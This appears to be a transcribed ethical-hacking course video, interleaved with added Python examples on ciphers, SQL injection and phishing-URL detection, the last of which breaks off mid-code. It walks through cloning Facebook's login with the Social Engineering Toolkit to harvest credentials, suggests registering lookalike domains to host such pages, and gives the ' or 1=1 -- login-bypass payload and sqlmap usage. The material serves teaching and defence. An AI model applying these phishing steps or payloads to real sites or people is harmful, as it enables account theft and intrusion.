If we want to reset our passwords, what do we have as a mechanism for resetting passwords? We have some security questions that we set up. Those questions are nothing but personal information that we would know, but through a social engineering attack it would easily be possible to gather the information that you have set for your security questions. The security questions can be as simple as the first school that you attended. You probably have that listed on your LinkedIn profile, where a person can just go in there, see your academic qualifications and identify the school that you were in, right? Similarly, it might also be a question like "what was your mother's maiden name?". That's a very good attack, I mean, if a person can interact with you: let's say they are trying to take a survey, and they approach you for feedback on a particular product that you have been utilizing, and they ask you these questions; you wouldn't think twice before giving those answers. As long as the request sounds legitimate to us, we are able to justify that request, and we do answer those queries. So it's upon us to verify the authenticity of the request coming in before we answer it.

Phishing, as discussed, would be fraudulent emails which appear to be coming from a trusted source, so email spoofing comes to mind, fake websites and so on and so forth. Exploiting human curiosity: curiosity killed the cat, right? There are so many physical attacks where hackers just keep pen drives lying around in a parking lot. Now this is an open, generic attack; whoever falls victim will fall victim. So if I just throw around a few USBs in the parking lot, obviously with trojans planted on them, some people who are curious, or who are looking for a couple of freebies, might pick up those pen drives and plug them into their computers to see what data is on them. At the same time, once they plug those pen drives into their computers, the virus or the trojan would infect and cause harm to their machine.

Then, exploiting human greed: we just talked about the Nigerian frauds and the lotteries, those kinds of attacks, the fake money-making gimmicks. Basically, this is where you prey upon the person's greed kicking in, and they click on those links in order to get the money that has been promised to them in that email.

So one of the safest mechanisms to keep data private and to keep yourself secure is using encryption. Now, encryption happens through cryptography. What is cryptography? Cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user; the only person with the key to unscramble that data would be able to unscramble it and make sense of it. So we are just making it unreadable, or non-readable, by using a particular key or a particular algorithm, and then we are going to send the key to the end user. The end user, using the same key, would then decrypt that data. If anybody compromises that data while it is being sent over the network, since it is encrypted, they would not be able to read it.

So the encryption algorithm would be something like this. Now, if you see, the word "computer", once made into an unreadable format, would look like "E Q O R X V G T". For the end user it wouldn't make any sense, but the person who has the key to unscramble it would be able to convert it back to "computer" and then understand the meaning of that word. So this is just a substitution cipher that is being shown on the screen. What is the key? The key is "alphabet plus three": so C plus three letters becomes E, O becomes Q, M becomes O. So the key that is utilized to scramble the data is: from the character that you are at, the third character from there is the corresponding character. The encrypted message is also known as a cipher. The decryption is just the other way around, where you know the key now and you can figure out what that E corresponds to by going back three characters in the alphabet.

Most of the time, a certified ethical hacker must decrypt a message without knowing the secret key. So let's say a ransomware has affected your organization, or has affected a device, and you want to figure out, or you want to decrypt, that data. Now, as an ethical hacker you wouldn't be for paying a ransom to the hacker, would you? So it is now your prerogative how you are going to work around it, how you are going to try to crack the encryption mechanism, how to crack the cipher to decrypt that message and see what's within it, right? Decryption without the use of a secret key is known as cryptanalysis. Cryptanalysis is the reversing of an algorithm to figure out what the decryption is without using a key.

So cryptanalysis can be done using various formats. The first one is a brute force attack, the second is a dictionary attack, the third one is a rainbow table attack. A brute force attack is trying every permutation and combination of the key to figure out what the key was; it is 100% successful, but it may take a lot of time. A dictionary attack is where you have created a list of possible encryption mechanisms, a list of possible cracks, and then you try to figure out whether those cracks work or not. Rainbow tables are where you have an encrypted text in hand, and you are trying to figure out the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place. So in the brute force attack you are trying every possible combination and permutation of what the key could be; in the dictionary attack you have a word list that would amount to the key, and you are trying to match all the words listed in the text file or word list to see if any of those words are going to work to decrypt that data; here in the rainbow table, the ciphertext is compared with another ciphertext, you find out similarities, and then you try to work, or reverse-engineer, your way accordingly.
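Added example, not from the lecture: the substitution cipher shown above together with the brute-force form of cryptanalysis, in Python. The shift is a parameter, because the ciphertext spelled out in the lecture, E Q O R ..., is what a shift of 2 produces for "computer" (a shift of 3 gives F R P S ...), so both can be checked. `brute_force` recovers the plaintext without the key by trying all 25 non-trivial shifts and ranking each candidate by how many of its words appear in a word list; that list is a constructed stand-in for an English dictionary.

```python
"""Substitution (Caesar) cipher and brute-force cryptanalysis (added example)."""
from __future__ import annotations

import string

ALPHABET = string.ascii_uppercase

# Constructed stand-in for an English dictionary, used to score candidate plaintexts.
WORD_LIST = {"A", "IS", "THE", "THIS", "COMPUTER", "PASSWORD", "SECRET", "MESSAGE"}


def caesar_encrypt(plaintext: str, shift: int) -> str:
    """Replace each letter by the one `shift` places later in the alphabet; leave other characters alone."""
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % len(ALPHABET)])
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(ciphertext: str, shift: int) -> str:
    """Knowing the key, decryption is just going back `shift` places."""
    return caesar_encrypt(ciphertext, -shift)


def english_score(text: str) -> int:
    """How many whitespace-separated tokens are known words (higher = more plausible plaintext)."""
    return sum(1 for token in text.split() if token.strip(".,!?") in WORD_LIST)


def brute_force(ciphertext: str) -> tuple[int, str]:
    """Cryptanalysis without the key: try every non-trivial shift and keep the best-scoring one.

    With only 25 keys this is exhaustive and instant, which is why a plain shift cipher
    is not secure. Ties are broken in favour of the smaller shift.
    """
    best_shift = max(
        range(1, len(ALPHABET)),
        key=lambda k: (english_score(caesar_decrypt(ciphertext, k)), -k),
    )
    return best_shift, caesar_decrypt(ciphertext, best_shift)


if __name__ == "__main__":
    print(caesar_encrypt("COMPUTER", 3))  # shift 3, as the lecture states the key
    print(caesar_encrypt("COMPUTER", 2))  # the letters the lecture actually spells out
    print(brute_force(caesar_encrypt("THIS IS A SECRET MESSAGE", 3)))
```

The brute-force routine needs no key because the key space is tiny and the plaintext is recognisable; real ciphers such as AES defeat this by having a key space far too large to enumerate, which is why the attacks that work against them target the password or the implementation rather than the key itself.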

Into a completely uh format which would be unrelated to the topic at hand so if i say i want to encode a message i turn a short message into spam so what this does is you want to send across a secret message you type in the secret message a

Short one, it will convert that into a spam mail. You send it across, so whoever is reading that spam mail would never get an idea of the embedded message within it. So if I want to type in a message here, "hi this is a secret message the password is asd@1234", and I want to send this out to people, or to one of my colleagues, but I want to send it in a secret manner so that others are not aware of it, then when I press on encode, what the algorithm does is convert this message into a spam mail. So my message, "hi this is a secret message the password is asd@1234", gets converted into this. Now if you read it, "dear e-commerce professional, this letter was specially selected to be sent to you"; this doesn't make sense, and there is no reference anywhere to the actual message that I typed. So if I copy this entire message and send it, let's say via email, to the recipient, the thing is that the recipient needs to know that I've encoded it using Spam Mimic; the algorithm needs to remain the same. Once they know that it is Spam Mimic, what they can do is this: in this instance I'm going to open up a new browser, go to the same website, and at this point click on decode. When I click on decode I'm going to paste the message that I have just copied. There we are, and this message is now being copied into a different browser. If I decode this, you will see that it converts it back to the original message. So the key is there at Spam Mimic, and it is embedded within the message, so whenever we paste the message into the decode function it knows what the key was, and it can decrypt that message and give me the actual message that was embedded within it. There we are, the entire message. This is what we created in the Google Chrome browser, and in the Firefox browser we decoded it.

Similarly, if I want to protect this kind of message, there is the aspirin encrypt.com website where, let's say, we use text encryption. I want to encrypt the same message, "this is a secret message the password is asd@1234", and then I give it a password to protect this message, let's say the word "password", and I use a cipher to scramble it, let's say AES, which is the strongest cipher right now, and I say encrypt. This is what the encryption looks like. Basically, if I don't have the password over here and I decrypt it, you would see that an error has occurred. If I type in the password and then decrypt it, it is able to convert that back into the unscrambled text and gives me what the original message was: "this is a secret message the password is asd@1234". So if I want to keep my data secure from hackers, I want to scramble it in such a way that they would not be able to crack it, or it would be very difficult for them to crack it, and this is one of the first mechanisms that would be recommended by any ethical hacker to keep data secure.

Now let's talk about downloading and installing Kali Linux. Along with that, we'll also be looking at the basic commands that are required for Kali Linux. All right, so I've opened my browser, and we want to go to the Kali website.

We want to go to kali.org. You can directly type in kali.org and go to the website, or I can just do a Google search and say "kali download"; it will give you the same website but take you directly to the downloads page. So either from here, or from the home page. Cookies are being installed on your machine, so see which cookies you want to allow; I'm only going to use the necessary cookies to support the site. You can see that this gives you the latest Kali Linux news and tutorials, gives you the latest release and what is in that release, and gives you a lot of documentation which will help you understand what tools have been developed and what functionality has been given in the latest version. If you want to download, you can directly go here and download Kali Linux.

Now, Kali Linux is a 2.6 gigabyte download, so it's going to take time. The latest version is 2019.4, and we click over here. I'm using a download manager to manage all these huge downloads; you can see it's pointed to the operating systems folder and it is going to be a 2.57 GB download. So you click on download, and in the background you can see this is going to be downloaded. We'll minimize this; it will take a few minutes to download. But this is an ISO image, so we need to install it on a virtual machine, and what we need for that is a hypervisor, which allows us to create virtual machines. We can either use VMware Workstation, which you can download from here; however, this is a paid version, so you can see it is around 250 or something for this software, but it is a very good software to have. If you click on download now it is going to start the download; it's a 30-day trial period, and if you want to use it after 30 days you'll need to enter the key which you get after purchasing the software. If you do not want to utilize this, as a free version you can download VMware Player, but there are some limitations for VMware Player that you might want to look at, so you want to compare these products before you purchase them. Otherwise you can download Oracle VirtualBox, which is a free hypervisor. It's not as robust as VMware Workstation, but it does the trick. So the free version, 6.1, is free, and you can create your own virtual machines over there and install operating systems on them.

What I do have is a VMware Workstation already installed, so I'm just going to open that up. That's my VMware Workstation; as you can see, I already have a lot of virtual machines created over here. What we are going to do is configure a virtual machine for the Kali Linux operating system that we are downloading, which should be somewhere here; let's see, it's at 43 percent, so halfway there. Till then, let's create the virtual machine. So I click on File, Create a New Virtual Machine. I'm going to customize the machine, so click on Next. This is the default; we don't want to change that. Then we want to install the operating system later; we don't want to point it out right now, so I'll just click on "I will install the operating system later", then click on Next. We want to install Linux. Now, in the drop-down you would not see Kali Linux; however, you can choose Ubuntu 64-bit, and that's what I'm going to choose. There it is. Next, what is the name that we want? I want to give it "Kali Linux", without the typo, and I want to store it in one of the folders that I've created. By default it stores on the C drive.

The C drive is not a good place to store it; you don't want to run out of space on your C drive. So I'm going to click on This PC, and this is my data, and in here I'll have a folder called VirtualBox or Virtual Machines. There it is, within which you can see the other software that I've already created. I'm going to create a new folder and call it "Kali 2019 L"; L for latest, for me, because you can see I already have a Kali Linux, so I'm just going to identify this folder with the L at the end. I'm going to select it and click on OK; you can see the path being changed over here. Click on Next.

It's going to ask you how many processors. Now, depending on the processor that you have (you can see I've got an 8-core i7), if I give it 16 cores or 16 processors, that's not going to work; I cannot go beyond what the physical hardware already is. So for this machine one processor with one core is more than enough. If you're going to use a lot of tools at the same time, you might just want to give it two cores, so I've given it two cores. Then it asks us for the RAM to be provided to this virtual machine; by default 2048 megabytes, that's 2 GB of RAM, which is more than enough. If you require more we can change this later on, so click on Next. We want to use NAT for now; leave this as the default, Next. Whatever is recommended, keep it the way it is; we do not want to change it, Next. Create a new virtual hard disk for this machine, and it is going to ask us the size; 20 GB is more than fine. Store it as a single file; you don't want to use the multiple-file option. Click on Next, and then click on Browse for where we want to store the VMDK file, the virtual hard disk file, and we go back again to the same folder that we had created, Virtual Machines, and we look at the Kali Linux folder, Kali 2019 L, and we want to store the VMDK file there. Once we save it, we click on Next and then on Finish. So this is the virtual machine that has been created right here; right now this is the basic configuration.

Now where are we at with the operating system? You can see the operating system has been downloaded and it is stored in this particular folder. So we go to the E drive, where we are looking for the operating system that we have downloaded; we downloaded it into the operating systems folder, and if we go in here you can see the current one, the Kali Linux 2019.4 ISO, right here. So what we do is go back to the Kali Linux machine that we have created, Edit Virtual Machine Settings, and we point this virtual machine, using the CD/DVD device, to the ISO that we downloaded. So we go back to the E drive, go back to OS, click on Kali Linux 2019 and click on Open. Now when this boots up, it will boot with this ISO, and that allows us to install the operating system. So click on OK, then we click on Power On This Virtual Machine. It starts powering on, boots to the ISO, and starts giving us the boot options. I'm just going to enter full-screen mode over here for this to be better visible. We don't want the live mode; what we want is the graphical install, so we highlight that and press Enter, and you can see the setup starting up. We'll wait for the GUI to pop up; there it is. Which language do we want? For now we want English; click on Continue. Where are we located? Click on Continue. Configure your keyboard: we want the US keyboard, American English, Continue. It is going to detect the hardware.

As you can see on the screen, it's attempting auto-configuration for most of these settings: the network with DHCP; it has identified the network cards and hardware like the processor that has been provided. It is asking for a host name; we're going to leave it at the default and click on Continue. Domain name: I'm not joining this to a domain as yet, this is going to be a standalone machine, so I can leave this blank and click on Continue. Now it is going to configure the network. It is asking for a password at this point, the root password; type in any password that you want, and ensure that you remember the password. By default the username for the account is the word root; we are just creating the password for the root account. Then we click on Continue: setting up the clock, looking at the hard disks.

Now here it asks us: do we want to use the entire disk, the 20 GB virtual hard disk that we had provided, or do we want to give it a manual configuration, or a guided one where encryption and logical volume management come into the picture? We are just going to use the first option, Guided, use entire disk. Don't worry, it's only going to use the virtual disk that we had created. Click on Continue; it shows us that it's the 21.5 GB VMware virtual disk that we had, and click on Continue. All files in one partition, that's what you want; recommended for new users. We don't want to change these folders; Continue. This is what we have configured, and once we click on Continue it is going to say "are you sure you want to make these changes"; click on Yes, click on Continue, and it will start installing Kali Linux on your device. Now this is going to take a few minutes for the installation to work.

All right, so that's the installation completed. Now it's asking us to configure a package manager: "a network mirror can be used to supplement the software that is included on the installation media; this may also make new versions of software available; do you want to use a network mirror?" We can click No for now and then click on Continue. Now this is going to install the GRUB bootloader; this might take a few minutes as well. Install the GRUB boot loader to the master boot record: Yes, click on Continue. Pick the hard disk that you have just utilized, this is the one, click on Continue; it will install the GRUB boot loader, running through the last phases of the installation. Now it says the installation is complete; we want to click on Continue, finishing the installation, and then it will do a reboot. All right, you can see this is starting up, so we just wait out the boot. Now it has started the booting sequence. I'm just going to maximize the screen, and you can see it's asking me for the password; this is the one that we created. Now that's not the password, that's the username, that's root, and then the password that we had created at that point in time. Then click on Login, and this is your screen.

Now what we need to do here is install VMware Tools, which helps us manage the screen and helps the virtual machine be a little bit better integrated on the system. That's not mounted yet, so we're just waiting for it to mount; there it is. What we want to do here is open the VMware Tools upgrader. All right, so what we want is to extract it, so we use Open with Xarchiver, and once we do that we'll see the vmware-install.pl. Double-click on that. All right, we've got the VMware Tools here. What I've done is Extract To, and I've extracted that on the desktop, so what we just did was click on the desktop over here, Open, and this is what it will do, and click on Extract. Now that is happening because I've already extracted this. Open this up; we want to run this vmware-install.pl. So what do we do? We open up the terminal window, which is the command line interface over here, and this is where some of the commands come into the picture.

For example, pwd shows us the present working directory, and ls shows us the list of the folders that are there. The folder that we have is on our desktop, so we'll just change directory to Desktop (cd Desktop), press Enter, and do an ls that shows us the list, and you can see vmware-tools-distrib; that's the folder that we have right here. So we want to go into that folder: cd vmware, and at this point you can just press Tab and it will complete everything over there; press Enter, do an ls, and we want vmware-install.pl to be executed. All right, so we tried executing that command and we had an error over there, so what we need to do is execute this command: ./vmware-install.pl. Now it will ask you for your input: installing VMware Tools, in which directory do you want to install the binary files? By default it is going to use /usr/bin; if I just press Enter it is going to use the default, as you can see from the input over here. What directory do you want for the init directories? I'm just going to keep pressing Enter for the defaults to come in. "This path does not exist; it is going to create it", default yes, defaults everywhere, and then it tries to start initializing it, to maximize the screen, and this is where it is installing. You can see that just by installing it, it automatically adjusted the screen, and now we have a full screen of Kali Linux right here. That is what VMware Tools does for us once we have installed the operating system.

Now you can see the entire screen here; you will see the tool sets that are given here. Now why are we using Kali Linux in the first place? Because this comes with a bundle of thousands of software packages that are ready to be utilized for ethical hacking, and they have been categorized over here: Information Gathering, Vulnerability Analysis, Web Application Analysis, and so on and so forth. You can see from Forensics onwards, Reporting Tools, and as you scroll down you can see development tools, graphics, internet, and the system configuration coming into the picture; these are your settings for your operating system. So these are basically your tools; we are right now in the Favorites. If I click on Information Gathering you will see the other tools for information gathering appearing over here; for Vulnerability Analysis we have got Sparta, nmap, fuzzing tools; for Web Application Analysis we have got Commix, Skipfish, sqlmap; Database Assessments; Password Attacks; and so on and so forth.

So if we just go into the Favorites, this is the terminal emulator that we utilized; it is the command line that we saw. We used the cd command, we used the pwd command, and we did the ls command as well to give us the list of the directory that we are in. Similarly there are commands like cat. So let's do cd downloads; let's see what's there. You can see this is case sensitive, so if I type in a capital D and then Tab, then ls, there's nothing over here in Downloads. cd .. takes us back one directory; I can see we are back from Downloads to root. If I want to go to Desktop, this is how I go to Desktop; do an ls, you can see the vmware-tools-distrib folder over there; cd vmware-tools-distrib and we go into that folder; ls gives us the list of all those files. Now you can see INSTALL is a file that we had edited back then, so if I do a cat INSTALL you will see that cat basically is the command that helps us look at the contents of the file without opening up the file, without editing the file. So if I scroll up, this is where we gave the cat command; it then printed the contents of the file over here and then exited and gave me back the command line right here.

Now if I want to copy this: cp /root/Desktop/vmware-tools-distrib/INSTALL, and if you want to copy it to /root/Downloads, press Enter. Now what we are going to do is see if this file, the INSTALL file that we just edited over here, has been copied to the Downloads folder. So we do an ls; we are currently in the vmware-tools-distrib folder on the desktop; we do cd .., which takes us down one directory, so we are still in the desktop; do a cd .., and now you can see we are back in root. Now we do cd Downloads, do an ls, and you can see the copied file right here, so if I do a cat INSTALL you can see the same content of that file coming in. So these are some of the commands that we would need to learn as we go ahead. The remove command: let's say we've got INSTALL; we do a man rm. man is the manual page command that gives us the pages with the description of how that particular command is to be utilized. So rm: remove files or directories; synopsis is the description; the options: -f for force, -i for prompt, capital -I for prompting once before removing more than three files, and so on and so forth. If you want to exit this you can press q to exit, and you come back to this page. So if I say rm INSTALL, then ls, you will see that the INSTALL file has now been deleted. So in Windows we use the del command; in Linux it is the rm command. So this is what we wanted to look at: the demo for Kali Linux, how to download it, how to install it, and some of the basic commands that we can utilize.

All right, let's begin with the phishing tutorial. We have the Kali Linux operating system booted up over here.

What we are going to do is open up a tool called SET, the Social Engineering Toolkit, which you would find in this option, and that's the tool that we want. It's a command-line tool, a menu-driven tool. We are going to host a fake Facebook page, and you can see how we can harvest credentials by this kind of an attack. So these are some disclaimers you might want to go through: do you want to agree to the terms of service? Yes, press Enter, and that's your Social Engineering Toolkit. We are talking about a phishing attack, which comes under social engineering attacks, so, like I said, it's a menu-driven tool; we just have to look at these options and type in the number of the option that we want. We want to do a social engineering attack, so I type in 1 and press Enter. In that, it is asking me whether I want a spear-phishing attack or a website attack vector; we are going to choose the second option, so I type in 2 and press Enter. Then it asks me what I want to do; I want to take the third option here, Credential Harvester Attack Method, so we want the third attack. Now it is asking whether we want to use the in-house website templates that it already has, or do we want to clone a site, or do we have a customized site that we have prepared that we want to import into this tool. We're going to do the site cloning option, so we type in 2 and press Enter, and then it asks me the IP address where it wants to capture and store the credentials; by default this is the IP address that I'm using, so if I leave it blank it takes my default IP address, so I'm just going to press Enter. Now it is asking me the URL to clone, so I type in https://www.facebook.com. What it does is connect online, and now it has cloned the website, Facebook's login.php. "The best way to use this attack is if the username and password form fields are on the same page; regardless, this captures all POSTs on a website, so you may need to copy www.* into the html depending on where your directory structure is. Press return if you understand what we are saying here", so press Enter. "The Social Engineering Toolkit credential harvester attack is running on port 80; information will be displayed to you as it arrives." So the site is at 192.168.71.134, the default IP address, and this is where the website is being hosted.

Let's check that out. Let me open up a browser on my host machine and point it to the Kali Linux machine that we have just created, 192.168.71.134, and you should see a login to Facebook coming up right here. It looks genuine; it is genuine, because we just went online and downloaded this. Let's just have a recap, an explanation of what we are trying to do. I am hosting a fake Facebook page on my server which has an embedded script in it that is going to do credential harvesting. So the attack here is: let's say, now that I'm hosting this, I can craft a fake email, send it across to a victim saying "your Facebook account has seen some unforeseen activity", create a hyperlink using HTML coding within that, "click here to access your account and verify that the account is secured", and when they click on that link they will be redirected to my fake page, which is here. You can see the IP address is my virtual machine's IP address, but I'm seeing a Facebook login page. I'm going to type in someone@somewhere.com and, for the password, I'm just going to type in the regular one that I use. If you see, when we typed in the username and password the page just refreshed and gave us the login page again, but now if you look at the URL I'm actually on Facebook's login page, which is exactly the same as the one I was hosting. So a layman wouldn't probably figure out they've been hacked by now; they would just figure, okay, they probably typed in the incorrect password and the page refreshed or something like that, and they're just going to log in, and they're actually going to access the Facebook page. Thus they might not even realize that something went wrong.

But if I go back to my virtual machine, you can see that it has captured some data and it is reporting over here what has happened. So if I just scroll up, let's see what happened here and whether we have been able to capture anything. So we got a hit; printing the output, this is the HTTP/1.1 200 OK response coming in, the password field, and if we just look, there it is: email someone@somewhere.com and the password that I typed in, asd@1234. So it has captured the username and the password right here. Once you're done, I mean, this is the way attackers work. Now this is a very basic attack; again, in the actual trainings you would then look at how you would host this on a real website and make it a global attack; right now it's a virtual machine with a Class C IP address. So here the thought process is: where can we get free hosting where we can host this kind of site, maybe I'll have to purchase a domain which looks similar to Facebook or to the victim that I'm trying to attack. So this is just a POC; we just wanted to find out how phishing is done, and this is exactly how it is done. Pressing Ctrl+C exits this tool and takes you back to the main menu; press 99, and 99 again, to exit, and there it is. Close the window, and that's the phishing practical.

After phishing, let's talk about SQL injection. SQL injection stands for Structured Query Language injection, which is a database attack, though it resides within the application, so it is the application vulnerability that we are trying to look at.

We are trying to bypass authentication. As the name suggests, a SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement. What is a SQL statement? A query that is used by an application and is fired off to the database; the database executes that query, gets the information that is required and sends it back to the user, if the user is authenticated.

So we're going to look at the SQL injection attack demo here. What we are going to do is go back to our VMware Workstation, and I have got a tool over here called OWASP Broken Web Applications, which is a utility that has been created for people like us to test our skills and to learn how we can develop our skills further. So this has a lot of vulnerable applications built within it; we're just going to try to access it and see if we can create a SQL injection attack. Just waiting for it to boot up; once it boots up it will give us an IP address. There we are, so we need to connect to 192.168.71.132. I can just use the same browser I was using, close up Facebook, and now go to 192.168.71.132, and this is the OWASP Broken Web Applications project. What we're going to do is go to Mutillidae, and this is an application that has a lot of information within it; you can see it gives you links about what you should do, Help Me, video tutorials, a listing of the vulnerabilities that they have, and so on and so forth. You can see we are not logged in right now; I'm just going to do this as a demo. So what we're going to do is look at this and bypass authentication.

We are taken to the login page where you need a username and password to log in. I'm going to type in test as the username and test as the password, click on Login, and you can see "that account does not exist", so the authentication mechanism works. Now what we want to do is create a query. Now what does a query look like when I type in a username and a password? If I just type in a single quote here, it is going to create an error, and this is what the SQL query looks like: SELECT username FROM accounts WHERE username = ' and then the exception error happened; it's not showing the rest of the query to us. Now what I'm going to do is craft a query here: a single quote, and give it a condition, or 1=1, space, hyphen hyphen, space. What happens is that the hyphen hyphen space comments out anything after it, so the password field is being commented out at this point in time, and I'm just giving it a condition where the condition is true: one does equal one, and if this condition is true it is going to allow me to log in. So you can see right now we are not logged in; this bypasses the authentication mechanism, and you can see "user authenticated" and we are now logged in as admin.

So in the training what we need to understand as a whole is how SQL works, how the queries are structured, and what the testing operators are. Now the single quote that we used, that was an operator in the SQL syntax; what these operators are, how they function, and then how we can leverage these attacks. There are different tools that are given to you in Kali as well that you can utilize. So in Kali Linux you can just open up a command prompt and there's a tool called sqlmap; you need to give it a particular site, so sqlmap -u for the URL, and whatever the URL is, and once you're here you just press the Enter key. This tool crafts all the queries in the background for you; you don't even have to know SQL queries or the SQL language. This is a very easy tool to utilize. Sadly I cannot demo this on a live website, because that would be illegal, but you can see how you can operate this yourself. That's what SQL injections are all about. Moving on, we now talk about VPNs, virtual private networks.
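Before moving on to VPNs, here is the login bypass from the SQL injection demo above as an added example. It is not code from the video or from the OWASP Broken Web Applications project: a constructed SQLite database with an accounts table, a login function that concatenates user input into the query (the vulnerable pattern the demo exploits) beside a parameterised version (the fix), and the single-quote probe that produced the error in the demo. The table, usernames and passwords are all made up for the example.

```python
import sqlite3

# Constructed schema and sample rows for the demo (not the OWASP BWA database).
SCHEMA = """
CREATE TABLE accounts (username TEXT, password TEXT, is_admin INTEGER);
INSERT INTO accounts VALUES ('admin', 'adminpass', 1);
INSERT INTO accounts VALUES ('alice', 'wonderland', 0);
"""


def make_db():
    """In-memory SQLite database seeded with the constructed accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_vulnerable_query(username, password):
    """The bug: user input is pasted straight into the SQL text, so a quote in the
    input ends the string literal and the rest of the input becomes SQL."""
    return ("SELECT username FROM accounts WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Returns the authenticated username, or None. With the input from the video,
    ' or 1=1 -- , the WHERE clause becomes  username = '' or 1=1  and everything
    after the -- (the password check) is a comment, so the first account in the
    table is returned without any password being known."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: a parameterised query. The driver binds the values as data, so the
    quote and the comment marker are compared as literal characters, never parsed."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def probe_with_quote(conn):
    """The single-quote test from the video: a lone quote breaks the vulnerable
    query and the database raises a syntax error, which is what an error-based
    probe looks for. Returns the error text, or None if no error occurred."""
    try:
        login_vulnerable(conn, "'", "x")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 -- "
    print("quote probe error:", probe_with_quote(db))
    print("vulnerable login with payload:", login_vulnerable(db, payload, "anything"))
    print("safe login with payload:", login_safe(db, payload, "anything"))
```

The same payload logs in as admin through `login_vulnerable` and is rejected by `login_safe`; the only difference between the two is whether the input reaches the SQL parser as code or as a bound value, which is why parameterised queries (not input filtering) are the standard fix.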

A virtual private network is basically a secure network that allows me to anonymize myself over the internet. So what I'm doing is connecting from here to a server that encrypts my channel, encrypts my connection, and thus allows me to keep my data secure. Now the basic essence of a VPN, or virtual private network, is to allow me this encryption mechanism where I can encrypt and safeguard my data. The added advantage that a VPN gives nowadays is that it allows us to spoof our IP address, or obfuscate our IP address, so we can actually become anonymous on the internet; it allows us to use multiple IP addresses and thus secure ourselves on the internet. For example, I use a VPN called CyberGhost, and what this allows me to do is use so many servers over here; if you look at the entire list, all the servers, then there are "no spy" servers, which guarantee me that they are not going to keep and store any logs, and thus they are not going to record any of the activity that I'm doing. Since they are located out of Romania this becomes a little bit safer for me, because the government and the laws over there are a little bit more relaxed than in other countries. They give me different links for torrenting, for streaming, for connection features. So there are a lot of VPNs out there; for example let's go to the website cyberghost.com, and we can see there's a sale going on, a 76 percent sale; or you can go on to ExpressVPN, which is also a very good VPN, and then there is NordVPN. It depends on what you want and how you want to utilize it. So just purchasing a VPN, or getting a free VPN, is not enough; it depends on which country the VPN originates from and which server you are connected to. For example, most countries have a pact where they share information amongst themselves, even if you're connected to a VPN; that means that the companies that provide these services have to generate and store logs, and these logs have to be reported to the government if it asks for them. Now there's a list of 14 countries that actually focus on this practice, so you have to find a VPN and a server that is not a part of those 14 countries, and ensure that those logs are not going to be reported to the government. These three VPNs basically are ones which are good; I personally use CyberGhost, I have used the others, and I just keep on rotating them to get an idea of which one is better. So these are VPNs that can allow you to anonymize yourself on the internet. Moving on, these are the ones that we talked about; there are others: SaferVPN, HideMyAss, ExpressVPN, and so on and so forth.

From our terminologies, let's now talk about VPS. VPS is basically a virtual private server, where you can rent a server as a service, a virtual machine as a service. So basically on a cloud, using infrastructure as a service, you can rent a server and utilize it for whatever activity you want. So let's go to these sites: register.com, GoDaddy, Network Solutions, or we can talk about other cloud solutions as well. So here you can register your domain names. In the previous exercise, let's say when we talked about the phishing exercise, what we want is to go on to register.com or godaddy.com and purchase a particular domain, for example something like this: instead of the o's I'm typing in a couple of zeros for "facebook", and let's see if anything like that is available. Something .photo is available, or facetips.com is available; there are other options that they're giving us over here. Once we purchase this we can then have our own hosting, with web hosting as a service, and you can have Linux-based hosting or Windows-based hosting depending on what you want; that's where your shared hosting comes into the picture. If you want to look at a virtual server and you want to rent a server over there itself, you can move on to Rackspace, rackspace.com, and here in your services you can have a physical server or a virtual server in a public cloud. Your other cloud providers, for example, would be Amazon AWS, and on AWS you can basically look at EC2, Elastic Compute Cloud, which is basically virtual servers in the cloud; over here you can rent out a server with whatever capacity you require. You'll obviously have to pay rent for what those servers are going to cost, but once you have those servers you can then launch any services on top of them.

Looking at other services, we talked about Tor. Tor is onion routing software that allows users to browse the web anonymously.
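Before the Tor demo, here is an added example that ties the phishing section and the domain-registration passage together from a defender's point of view. The cloned page in the SET demo was served from a raw IP address (192.168.71.134), and the domain passage shows how a lookalike name (zeros in place of the o's in facebook) could stand in for that IP. The code below, which is not from the video or from any of the tools it shows, checks a login-page URL for exactly those signs plus a brand name hidden in a subdomain. The brand list, the confusable-character table and the test URLs are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed list of brands to protect; facebook.com is the one the video clones.
PROTECTED = {"facebook.com", "paypal.com", "google.com"}

# Digit/symbol-for-letter substitutions; the "zeros for o's" trick from the
# domain-registration passage is the first entry. Constructed for the example.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "$": "s"})


def registrable_domain(host):
    """Last two labels of the host name; good enough for the .com cases here
    (a real deployment would consult the Public Suffix List for co.uk and friends)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_ip_literal(host):
    """True when the host part is a raw IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def phishing_indicators(url):
    """Return the reasons a login-page URL looks like a credential-harvester page.
    An empty list means none of these heuristics fired."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons = []
    if parts.scheme != "https":
        reasons.append("login page not served over https")
    if is_ip_literal(host):
        # The SET demo serves the cloned page straight from 192.168.71.134.
        reasons.append("login page served from a raw IP address")
        return reasons
    domain = registrable_domain(host)
    if domain in PROTECTED:
        return reasons  # the real registrable domain; nothing more to flag
    # faceb00k.com becomes facebook.com once the substitutions are undone
    undone = domain.translate(CONFUSABLES)
    if undone in PROTECTED:
        reasons.append("lookalike of %s (character substitution)" % undone)
    # facebook.com.verify-account.example: the brand is only a subdomain label,
    # the registrable domain belongs to someone else
    for brand in sorted(PROTECTED):
        name = brand.split(".")[0]
        if name in host:
            reasons.append("brand '%s' in host but registrable domain is %s" % (name, domain))
            break
    return reasons


if __name__ == "__main__":
    for sample in ("https://www.facebook.com/login.php",
                   "http://192.168.71.134/",
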